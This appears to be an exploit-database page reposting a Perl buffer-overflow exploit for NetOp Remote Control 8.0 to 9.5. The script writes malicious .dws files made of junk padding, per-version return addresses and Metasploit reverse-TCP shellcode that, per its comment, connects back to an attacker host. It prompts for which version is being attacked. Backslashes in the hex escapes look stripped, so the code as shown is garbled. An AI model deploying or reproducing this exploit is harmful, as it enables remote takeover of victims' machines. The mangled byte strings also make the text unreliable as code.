Home / exploits NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 Buffer Overflow
Posted on 29 April 2011
# Exploit Title: NetOp Remote Control Buffer Overflow # Date: April 28, 2011 # Author: chap0 # Version: 8.0, 9.1, 9.2, 9.5 (Possibly anything before ver 10) # Upgrade to Version 10 for fix # Tested on: Windows XP SP3 # # Greetz to JJ IE by day Ninja by night, br34dcrumb5, myne-us, Exploit-DB, Corelan # # #!/usr/bin/perl $file0 = "netop80.dws"; $file1 = "netop91.dws"; $file2 = "netop92.dws"; $file3 = "netop95.dws"; my $junk="x41" x 524; my $ret0 = "x9BxC2x40x20"; #0x2040C29B [nupdate.dll] my $ret1 = "xB3xE9x3Dx20"; #0x203DE9B3 [nupdate.dll] my $ret2 = "x1BxFCx44x20"; #0x2044FC1B [nupdate.dll] my $ret3 = "x13x26xB5x20"; #0x20B52613 [nupdate.dll] my $extra = "x41" x 20; #./msfpayload windows/shell_reverse_tcp LHOST=172.16.20.27 LPORT=443 R | msfencode -a x86 -b 'x00x0ax0d' -t perl #[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1) my $shellcode= "xb8x34xc1xf5xccxdbxd1xd9x74x24xf4x5ax33xc9" . "xb1x4fx31x42x14x03x42x14x83xc2x04xd6x34x09" . "x24x9fxb7xf2xb5xffx3ex17x84x2dx24x53xb5xe1" . "x2ex31x36x8ax63xa2xcdxfexabxc5x66xb4x8dxe8" . "x77x79x12xa6xb4x18xeexb5xe8xfaxcfx75xfdxfb" . "x08x6bx0exa9xc1xe7xbdx5dx65xb5x7dx5cxa9xb1" . "x3ex26xccx06xcax9cxcfx56x63xabx98x4ex0fxf3" . "x38x6exdcxe0x05x39x69xd2xfexb8xbbx2bxfex8a" . "x83xe7xc1x22x0exf6x06x84xf1x8dx7cxf6x8cx95" . "x46x84x4ax10x5bx2ex18x82xbfxcexcdx54x4bxdc" . "xbax13x13xc1x3dxf0x2fxfdxb6xf7xffx77x8cxd3" . "xdbxdcx56x7ax7dxb9x39x83x9dx65xe5x21xd5x84" . "xf2x53xb4xc0x37x69x47x11x50xfax34x23xffx50" . "xd3x0fx88x7ex24x6fxa3xc6xbax8ex4cx36x92x54" . "x18x66x8cx7dx21xedx4cx81xf4xa1x1cx2dxa7x01" . "xcdx8dx17xe9x07x02x47x09x28xc8xfex0exbfx5f" . "x10x84x5bxc8x13xa4x5axb3x9dx42x36xd3xcbxdd" . "xafx4ax56x95x4ex92x4cx3dxf2x01x0bxbdx7dx3a" . "x84xeax2ax8cxddx7exc7xb7x77x9cx1ax21xbfx24" . "xc1x92x3exa5x84xafx64xb5x50x2fx21xe1x0cx66" . "xffx5fxebxd0xb1x09xa5x8fx1bxddx30xfcx9bx9b" . "x3cx29x6ax43x8cx84x2bx7cx21x41xbcx05x5fxf1" . "x43xdcxdbx01x0ex7cx4dx8axd7x15xcfxd7xe7xc0" . "x0cxeex6bxe0xecx15x73x81xe9x52x33x7ax80xcb" . "xd6x7cx37xebxf2"; print<<EOF; NetOp Remote Control Buffer Overflow By chap0 - www.seek-truth.net Choose a number for the version of NetOp are you attacking: 0 - NetOp 8.0 1 - NetOp 9.1 2 - NetOp 9.2 3 - Netop 9.5 EOF print "Selection: "; chomp ($select = <STDIN>); if ($select =~ 0) { print "Creating payload for NetOp 8.0 "; my $payload=$junk.$ret0.$extra.$shellcode; open(FILE,">$file0"); print FILE $payload; close(FILE); print "Done. "; } elsif ($select =~ 1) { print "Creating payload for NetOp 9.1 "; my $payload=$junk.$ret1.$extra.$shellcode; open(FILE,">$file1"); print FILE $payload; close(FILE); print "Done. "; } elsif ($select =~ 2) { print "Creating payload for NetOp 9.2 "; my $payload=$junk.$ret2.$extra.$shellcode; open(FILE,">$file2"); print FILE $payload; close(FILE); print "Done. "; } elsif ($select =~ 3) { print "Creating payload for NetOp 9.5 "; my $payload=$junk.$ret3.$extra.$shellcode; open(FILE,">$file3"); print FILE $payload; close(FILE); print "Done. "; } elsif ($select =~ '') { print "Please make a selection. "; }
